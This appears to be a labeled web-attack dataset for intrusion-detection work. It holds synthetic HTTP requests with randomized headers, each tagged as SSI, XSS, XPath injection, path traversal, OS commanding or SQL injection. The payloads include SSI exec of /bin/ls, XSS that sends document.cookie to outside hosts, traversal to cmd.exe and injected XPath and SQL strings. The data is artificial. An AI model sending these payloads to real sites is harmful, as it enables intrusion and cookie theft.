Pragma: no-cache
Proxy-Authorization: NTLM NXJtNWF0Y3NlZFR4aWh1ZGlkdGU4cGlzc2RldGNyeHJlYXl0Wm5PaWN1
Authorization: NTLM dG43dUlpZnNkdGVyeWVxaWZvaXNpb3NhcnRpY3dhcU9hc2F1c2dhZWVvYQ==
Range: 354-,63882-
Referer: /uacsa/zai0ca/eal2/1oTrULm.txt
TE: trailers,gzip;q=0.7,deflate;q=0.8
Trailer: Upgrade
User-Agent: ihcngpcuee/6.1
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 8.0 9.172.27.77, HTTP/8.6 www.hhlqse.png, 9ti/3.8 54.63.61.109
Transfer-Encoding: deflate
Upgrade: paa/8.6, yprO/1.1
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45499
Start - Id: 40120
class: SSI
GET /tow/lYcmViErD7e/8yrlraatn/tyida/lci.png?_RwOSsIG@F=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l++++%2Fhome%2Fa2qUesriu%2Fih%22++--%3E&gjEn1=xhotqlxa&3FE8=mcago%3Dov&rd=76846 HTTP/1.0
Host: www.htnnisw.cz:458
Connection: vhehr
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3, gzip;q=0.6, deflate;q=0.6, deflate, compress
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Fri, 08 May 09 14:46:41 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 01 Feb 08 04:55:25 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:20:16 UTC
If-Match: "evoRPiZxEK_61Fssz3"
If-None-Match: "E9KpFInStExR8VetqN"
If-Range: Thu, 13 Oct 05 07:24:31 GMT
Max-Forwards: 98
MIME-Version: 3.4
Pragma: q='fnr'
Proxy-Authorization: Basic d2VuYTE1aWE6c3lhYzY=
Authorization: Basic bW50cDdEbjpMc2dlaWU=
Range: 01784-577,9-7,8678-
Referer: http://www.aerrh.gov/dnsfer/oo9csnf/oSahld/ogtosxi7.asmx
TE: chunked,chunked;q=0.6,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (compatible; Tesel2o; Linux i386; ie1ps)
UA-CPU: 68000
UA-Disp: 8182,5910,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 768x931
Via: 8.3 187.11.111.246
Transfer-Encoding: compress
Upgrade: hftdus/4.4
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40120
Start - Id: 48537
class: XPathInjection
POST /rtihL/ehsuDadtha/rnownsnsnei2ndv/g-7/reHcYnypChxAK..jpeg? HTTP/1.0
Content-Length: 369
Content-Language: i,oo,ridgdlc
Content-Encoding: compress
Content-Location: /jpran/pan1od.swf
Content-MD5: bjk2NGFpVmV0dHJ4c0Nhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Apr 09 08:11:59 UTC
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: www.g3py.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.7, deflate, gzip
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="6"
Date: Sun, 24 Sep 06 07:55:02 UTC
ETag: "GcXnmUBFxWJV.V3_q"
Expect: ulHtWen3
From: l7hgtc@eorr.be
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Mon, 09 May 05 18:48:25 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 10:38:06 GMT
Max-Forwards: 0245
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: Basic c24wb2RvdTp6bmhhdGU=
Range: 8664-
Referer: http://www.t5crr.org/ietu/tmhidi/i7hiee.dll
TE: deflate;q=0.4
Trailer: Max-Forwards
User-Agent: lKbvqo/2.7
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: gzip
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vgaetcntPthoo=786&t4rsauxrhntenai=tYQVG&dznha9=es55 mhmoIc1&caiyipsrsooH=0h&t5u5rmdi5swd=s7s_S5b47t&r8teoze=itTwSeatsRepe&MhEd1erruTane=isM=pr&cH%objectd2l?t5up&hodUgotsrtvas=odlu&maoeu= &zeuesditstehti7=lo6mdw&cugarskTl=s2pthqN&lgm8adnneptn=tteonqmE'  or     6  <     count(path/child::*)  or   'nn'  ='&sca2wlyeOr=1610&.httppzCSBopenf=36

End - Id: 48537
Start - Id: 48279
class: XSS
POST /Jv8lET5telnet2rT/Csdqit5ksIsaratIotM/s45Z1FNz9eRw/eDeifuy/t1qRCm88wZi.z0/a7MUlikeeW-Ghtpasso/awee1sr/tUoKkTcBue/kryLAtaEk5.msf? HTTP/1.0
Content-Length: 243
Content-Language: 5N,9s
Content-Encoding: deflate
Content-Location: http://asttyhe.uk/uiecr4v/zaedso/hsmaehot/aeei1rtg/aitmh.php
Content-MD5: b2VhZWJnbWlhdWFUZTBhQw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Nov 07 05:42:29 GMT
Host: 116.58.101.190
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.9
Accept-Language: nheh-oa
Cache-Control: no-cache
Cookie: saai=4b+;Spscmd1lhboot.inid=<img  src   ="   tinine "onmouseover=   " [document.location.replace ('http://www.tori.com/cgi-bin/llinte.cgi'+document.cookie);]    "   >
Date: Tue, 08 Mar 05 13:58:49 UTC
ETag: W/"e0kTBOOTUusg65Gcj"
Expect: 100-continue
From: rpaasots@jaUNp.com
If-Modified-Since: Wed, 01 Feb 06 07:23:34 GMT
If-Match: *
If-Range: Mon, 20 Aug 07 04:38:59 UTC
Max-Forwards: 7421
MIME-Version: 9.3
Pragma: no-cache
Authorization: Digest cnonce="ef3d4D"
Range: 5799-
Referer: /lE0yus9/mcbht9aa/OSti.php4
TE: deflate;q=0.8,trailers
User-Agent: Mozilla/0.2 (X11; U; Linux i586 4.8; js-Nz; rv:8.3.7) Gecko/62589511
Via: 7.4 210.159.25.253, cerrk/0.1 164.23.205.148
Transfer-Encoding: compress
Upgrade: aGt/7.8, estva/0.5, efnoc/9.1, h4hddl/8.7, 8ebmar/2.0
Warning: 946 www.inoh.jpg "l4aerdips3tmta6SiRi" 

opc7r=i_Ap8giG7&2tshavingSlUsmI=a3libi&yBSEt0oere0hE=Odo&7lttomte=eriytrk7oTihw&eAtzdzrun=5N |xrpaIoR'\o&o0ihr=Rcw&anemd0aii=heTo&iEu=nsleSs&l-ZCYechildZi=w0e&3olfn=9&RBfERP=504&tptEyaycmeot6cy==[rlog&hnbyhtzdt=%&eufalrui=wc&ts=fau

End - Id: 48279
Start - Id: 39974
class: SSI
GET /affioEnisss/z@OMvjRouuYO6J/iQSl./stxttiol5naa/hhg0.66.ZbbS/tR7x1/Ndtv3ln/uQ@aVCkW310/lcd/lu/iu3m8/2Q4m4.htm?gemdrslesLcl=215&ctm=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2Fiverulnnei%2Febeeortepu%22+++++--%3E&toesee=+atw&gSdUWxHqJJfP=accept6%3Ei&ia4pl=wkT4p&c6OR9=tnw9soe4ssneTg&mu0xcgotna=768&d2eovbe=949369&dyeiroxweepHej=w0twindow.open&hreriotlhsas=6145690884&ehdeeecxwa8l=eDDi%40q&UyjfT=006057287&49eeq=vxi&rnoe0Ejlydmt=durIxrtsasS%3Dqwgbini0iq&seo=5668292 HTTP/1.1
Host: 42.77.246.140
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-cyrillic;q=0.0, iso-8859-2;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 160.248.173.144
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="03"
Date: Wed, 12 Apr 06 06:41:47 UTC
ETag: "syLbFXo8hSf7y.nXN"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Fri, 18 Sep 09 03:37:33 GMT
If-Unmodified-Since: Tue, 21 Mar 06 09:50:52 CET
If-Match: *
If-None-Match: "K0tdW4yv_K7@OCCTKU"
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 4901
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: iyadh rlvunwul=l4lu
Range: 75-
Referer: http://www.gnO3.st/oDwtaCbc/r8tr/emldh.jpg
TE: trailers,trailers
Trailer: Range
User-Agent: e6ehlmeb5twutn
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39974
Start - Id: 47141
class: XSS
GET /E2e6owdpbboBtiw.htm?gD8locationmbjOSvT1=32020507&9nfEennte=do+kelasNoNn&oa81s1anEoc6nM=h%5C&fn6d=bewindow.opentelneta2h%7Egroup+byupa%26%27+%29+li&9jN1bDY%u=perd&aartdwiEIc7=%3Cimg+++++src%3D++%22+++++livescript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Frinsll.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E HTTP/1.1
Host: www.NtITLe4s.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 194.231.176.241
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="05"
Date: Wed, 18 Mar 09 07:36:08 CET
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: 100-continue
From: eanm@dnoaf.cz
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: "1SNI7.GHyFvSP_@Ea"
If-None-Match: "UdGQgBJJXIMgwNCtTiI6"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bnJ0MHUzNGkzYjVhaXZyYXdlY29sOXJvZGlvbnNhc290b3Jscw==
Range: -35233,639-
Referer: http://yjehegI.ch/lred/ilnahi6w/lOooo/xeshjnet/6Eoiwrie.jsp
TE: trailers
Trailer: Via
User-Agent: arNn (wYTMXrbk; iLeT8Rf)
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: deflate
Upgrade: oslis0/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 710374983
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47141
Start - Id: 48146
class: XSS
GET /mtktXl1/ZpuG/Pt-.3/w@_bxE0YEWWUG8yAfU/p6FYQvjHe/awob/okww/Iarr/zCbql3V@73F90/oanyr7w0swexesC9.css?6hat=%3C%21--+--+--%3E%3Cscript++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.roer.com%2Fcgi-bin%2Fetsialan.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&sia3u=blenHwtootemktea&ti.F=mochazAep2 HTTP/1.0
Host: www.wtnaiti.cz
Connection: close
Accept: video/quicktime
Accept-Charset: iso-8859-8-i, big5, windows-1252;q=0.5, big5;q=0.8
Accept-Encoding: deflate, identity;q=0.4
Accept-Language: *;q=0.6
Cookie2: $Version="6"
ETag: "edxaARqn7vBqEGl"
From: etoe9@uoeb.st
If-Unmodified-Since: Fri, 18 Nov 05 16:37:15 UTC
If-Match: *
Referer: /eeIwrPl/kbeArrq/oetni9nK/eeip3/EpSeot.php3
User-Agent: Mozilla/0.4 (compatible; NearasQyaR; Linux i386; jiibk68tl; bttRgoo; qelpi)

null

End - Id: 48146
Start - Id: 48516
class: XPathInjection
POST /fnZwJ1H6MZ/wn/sisir55Ze/oeAIda1c57hissebg/jmr7siI8h/aaEavipxhanjbR9/3kyF8fqX252.3-U.uuj/iTfi@35o3.vV_k.V8I/fJNaB8Us/k05dF.1GQd.asmx? HTTP/1.0
Content-Length: 370
Content-Language: igmc,k
Content-Encoding: compress
Content-Location: /aaxa.ace
Content-MD5: ZWlhZWh0RWZzOEV0aWROaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: www.sliftueeea.cz
Connection: sicasef
Accept: audio/basic, text/plain, text/html
Accept-Charset: hz-gb-2312;q=0.0, iso-8859-1;q=0.4, cp-936, iso-8859-8-i, koi8;q=0.5
Accept-Encoding: identity, identity;q=0.4, identity
Accept-Language: Ieroro-gi;q=0.4, Esnmn1f-seCed, et0t9-socrnsR, rIaNSZ-so;q=0.6, tsnto6e-1eu
Cache-Control: max-age=1038
Client-ip: 171.224.239.130
Cookie: ouds1=eee<;hocyitkhs=2085
Cookie2: $Version="2"
Date: Tue, 26 Jul 05 21:25:19 CET
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Fri, 01 Jun 07 16:14:51 GMT
If-Unmodified-Since: Thu, 28 Feb 08 02:44:04 GMT
If-Match: *
If-None-Match: "nF.LSAMBYm1djvYQn5Z"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 244
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: /l3Ts/Nwj8saos/ieadi9/thUjEosn.jsp
TE: gzip;q=0.2,trailers
Trailer: Accept-Charset
User-Agent: o82hd6 (hZZ-y.cGV; i.iqe@)
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 951x0046
Via: 7.2 www.apdmso.js:3977, HTTP/4.7 21.124.98.59, 7.7 135.74.148.245
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

kee=3wn8Ml2iiq&rdAodeQmobwb=c2tGkHFkZ&o3r=201&negTG7gi=einolsoc&kRnivate=rE8RwTsL.Y&ofauhrowosrinn=s6WhNEdmcbh&ecnEdHo=018955&oNeFua9tedTarm=]]o e&yt=asn<k0oti8idvarj)&l6tsnttbliSr=fiirsc/cnt/scStf/child::node()[     position()=8]     |    ye/K1/llIF/child::text()[position()=181]    or    '2i1'   =    '

End - Id: 48516
Start - Id: 45890
class: PathTransversal
GET /mTmZi1Q4IMHh5G.htm?Ysgmassnop=44&twOZl9atrdnp=gu5qEJdau2kn&dohtsgt=014126350&fahjeOsfre8phhN=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Friieasntas%2Filareser%2Feslaat%2Fdeen.dll&u-mailA6vt=t7h%3Etir%7Ekes&ryn=hm6dT9bgn HTTP/1.1
Host: www.Tbeftuethe.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Tmi-rtq;q=0.3, meuwediz-ubh2sIe
Cache-Control: no-store
Client-ip: 174.163.182.93
Cookie: eadr=fihaiwle;acsrrkngie=07;2YDgroup byKrM=575;MJZbaEf@j-EI=b9Otb;idlHne4lehelf=trihm;I6ftpoA%uo=mh%7Ca
Cookie2: $Version="33"
Date: Tue, 21 Oct 08 05:45:58 CET
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Fri, 28 Nov 08 15:33:18 GMT
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "YjPVrmyfY.f2_wnQPW2-"
If-None-Match: "iQ4joX.SwtlLrsnm1I"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 567
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: RsBe h3em=leSos5t
Range: 58-182597,4-9
Referer: /arnIrafn/qllt/ees0e/nhl3isi3/45loert.cfm
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.3 (compatible; Konqueror/3.9; SunOS sun4u; riheq0ea)
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: identity
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45890
Start - Id: 48465
class: XPathInjection
GET /erfoo/aob5Rqlemokek2eng/I_5linkgX02B1HDbv/n1kgN9tKzgmRra7TNWP/l5a/tvBVS8nZ82fm4uL/7h721VZW@mAW7t3@/bb/uoat.htm?vestRgotsi=1+mil&ete=209&edHaatpsldkI=rrang1eoaldda&spn5orwt=nqnIl%2F&tlra16d=%27%3Eeo&b9usflisdhpw5a=nZtv&e5ooaenltDEi=mnhse4r HTTP/1.1
Host: www.bheuiao.gov
Connection: ku4inw
Accept: application/postscript;q=0.1, audio/*, audio/*;q=0.9
Accept-Charset: big5, x-mac-ce
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.161.103.42
Cookie: tjrknitg0nC=p6gyrus' or  1<    t/ogt7vt/ie88tw/child::text()[position()=38]   or     'tzerdal'=   ';oe4iotpsoeuij=1018
Date: Fri, 23 Nov 07 08:55:44 CET
ETag: "FJ9quKMAVTx1pyuby5Q"
Expect: pnbn=eum8h;vlns0aa
If-Unmodified-Since: Sat, 28 Feb 09 18:15:37 UTC
If-Match: "MfDMQfgFdkbUUGs4v"
If-None-Match: *
If-Range: *
Max-Forwards: 0
Pragma: no-cache
Authorization: Basic ZWR4ZjpoZWlyZ2Q=
Range: 9601-3,181022-,-02
Referer: http://adyCetd.st/veenrda/s7tz.txt
TE: trailers,gzip;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/2.5 (X11; U; Unix 3.6; di-Mi; rv:6.4.5) Gecko/43018127
UA-Disp: 5787,577,8
UA-Pixels: 458x026
Via: HTTP/9.3 116.58.52.111:9570
Transfer-Encoding: gzip
Upgrade: ntet/6.9, sds7/4.1
Warning: 453 106.126.192.35 "eoatO" 
X-Serial-Number: 326579
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48465
Start - Id: 43762
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 214.45.236.142
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-950, cp-932, x-mac-japanese, koi8, x-mac-icelandic;q=0.7
Accept-Encoding: 
Accept-Language: Hakr-O;q=0.6, iui1t2-drrcwnE, leeOe-aaotm, uuruon-t
Cache-Control: no-cache
Client-ip: 255.84.192.160
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Wed, 19 Mar 08 04:42:08 GMT
ETag: W/"_ovet8UqV-BuFDsMo882"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Fri, 03 Jun 05 08:30:18 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: *
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 534
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Basic ZGhyb0Flb2g6ZWVobGExcw==
Range: -541349,6-1
Referer: /samsi.dll
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 1.3; ee-fp; rv:6.5.0) Gecko/82003252
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 817 www.ntpiq.tiff "GhTia" "Thu, 28 Jan 10 03:22:21 UTC"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43762
Start - Id: 43796
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 116.92.103.148
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, compress;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 209.54.112.168
Cookie: mebhf=80906;Qbody.RE0irPzIiframe=henn3ume;67wP=dtoZ;tbBQ=ayc;poT3ne6orzw=i6yuo
Cookie2: $Version="3"
Date: Wed, 14 Jul 04 16:54:13 UTC
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Thu, 09 Mar 06 09:52:20 GMT
If-Match: *
If-None-Match: "NLC1kQ4611zfCMdym"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 9835
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: NTLM cnRlMkRrcmZjdnBpaU91YWRkbmVhYWdyaWkxdGFlYW1z
Range: 904036-,02113-35,44499-
Referer: /2aozaahI/se2errv/rndnaTT/8at0tn.cgi
TE: chunked,trailers
Trailer: Pragma
User-Agent: f4S1Ccy6K http://www.2ckxS.uk
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43796
Start - Id: 49348
class: XPathInjection
GET /LlibJHhNcDetcHOlikew/3OSCbHukz27lwDguY/jQJR0ddo/Xq7F0jr.cfm?fidoie60dye=84&ue07nhztuuse=%28i++%3C++++count%28upsr%2Fchild%3A%3Atext%28%29%29+++and++++j++%3C+++++count%28gns%2Fchild%3A%3Acomment%28%29%29++++and++k+++++%3C++count%28unzui%2Fchild%3A%3A*%29+++%29&hin=%3Ath&nha=Ddtomjiaddseyae2sh&tuc0=1eessehdpmmocha&vpRfFOGET5=stmp&ruifxnlet4vwa=7roin&lyibd77j8=588178081&rbtHi=886797017&CfhySe=2&ir=1 HTTP/1.0
Host: 6.99.230.240
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250;q=0.7, windows-1251;q=0.4, cp-950;q=0.5, windows-1254;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 144.73.134.163
Cookie: obtes=ns0iaoW
Cookie2: $Version="415"
Date: Sat, 11 Oct 08 18:51:46 UTC
ETag: "BrVgUNrCZpWEqF@yQF"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Fri, 13 Feb 04 15:52:28 UTC
If-Unmodified-Since: Mon, 08 Jan 07 05:12:31 CET
If-Match: "epaBLMRE1Y4GzxZKArzw"
If-None-Match: "s4JD3HVD3q6xRtR"
If-Range: "uXLagBPd6tx@WL.hE"
Max-Forwards: 392
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: paIta yEnolhc=1srhn
Range: 50519-,-46393
Referer: /exqodg/gon6smf/elnlh/je1p.bin
TE: deflate,gzip
Trailer: Upgrade
User-Agent: Mozilla/5.8 (X11; U; Linux i386 7.4; ee-6s; rv:2.4.3) Gecko/22885934
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: gea/8.9 www.ne5nnEtd.htm, 3.2 www.intn.gif, 9.5 www.h2oe.tiff
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 5083786
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49348
Start - Id: 41625
class: SqlInjection
GET /3HR@ShKBlkboot.ini./Do/9J/gUVvCzNr.insertf/Zx/l13rSiorrssxqehann/eo/sTkem.WY/teyshCszjksMt3nho/eME7-XeTFbiFbbzsY5So/wre9ig2g4av5Imltdtzp.js?5eElt=12662553&7gNaeeSata=tsE10v&Eeul=%27select+++++customer_phone+++++%27%7C%7C%27from+++customers+%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and+customer_type%3D1%27%3B&mawix9d3hd6itr=aLkafpu7.&GHM58s=4834 HTTP/1.0
Host: 254.235.228.146
Connection: 28iatcc
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Tue, 07 Apr 09 13:56:28 GMT
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: llbt0
From: enlbuaah@iDob1m.fr
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Wed, 12 Dec 07 03:25:41 GMT
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: *
If-Range: Sun, 09 Apr 06 07:14:00 CET
Max-Forwards: 46
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: /yuaf/wKgh4do3/ys8sljne/cfiIeno.swf
TE: trailers
Trailer: Authorization
User-Agent: tieovae/4.5
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 064x464
Via: 2.8 www.t5as.js
Transfer-Encoding: identity
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 475701883207700445
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41625
Start - Id: 44969
class: PathTransversal
GET /euU/XYiOxZtmLselect/L4xUVS6/ellennatg6kyei/eIoaY9IHshutdownr5formmX9/emsgd/iXtiiyKnrwino/a2KTrUwzRNLgZiSU.bIl/aRDLUK8.jpg?otTce=file%3A%2F%2F%2Fn%3A%2FfY%2Ff7%2FeeeXncla.xml HTTP/1.1
Host: www.wrevrnAb2i.com
Connection: hh1a
Accept: application/postscript
Accept-Charset: windows-1258;q=0.4, iso-8859-15;q=0.3, utf-8, shift_jis;q=0.1
Accept-Encoding: 
Accept-Language: 1u-oeapea
Cache-Control: min-fresh=4460
Client-ip: 141.6.207.75
Cookie: 5zdlnlBsaQn=r0s6hetoiur4i5
Cookie2: $Version="04"
